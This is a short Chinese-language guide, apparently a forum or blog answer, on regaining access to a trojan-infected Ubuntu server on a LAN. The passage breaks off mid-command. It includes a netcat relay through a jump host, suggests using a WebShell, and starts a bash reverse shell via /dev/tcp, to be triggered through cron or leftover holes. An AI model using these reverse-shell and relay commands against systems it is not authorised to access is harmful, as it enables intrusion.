Ubuntu服务器中了木马且处于局域网内无法直接通过公网正向连接
如果你的Ubuntu服务器中了木马且处于局域网内无法直接通过公网正向连接,可以尝试以下方法进行应急响应和恢复控制:
一、尝试通过局域网内部访问(优先方案)
如果攻击者未完全封锁你的权限,且你有局域网内其他机器的控制权:
通过跳板机连接:
使用同一局域网内的其他机器作为跳板,通过SSH或工具(如nc)中转连接:
# 在跳板机上监听,转发流量到目标服务器
nc -lvp 4444 -c "nc 目标服务器IP 22"
从外部通过跳板机访问目标服务器。
利用已有服务:
如果目标服务器运行了Web服务(如Apache/Nginx),尝试通过WebShell或上传临时管理脚本(需权限未完全丢失)。
二、利用反向Shell让服务器主动连接你
如果目标服务器仍能出网(允许出站连接到公网或你的控制端):
在你的控制端监听:
nc -lvp 5555 # 或使用更稳定的工具如socat、msfconsole
在目标服务器触发反向Shell(需有命令执行权限):
通过定时任务或木马残留漏洞注入命令:
# 使用bash反向连接
bash -i >& /dev/tcp/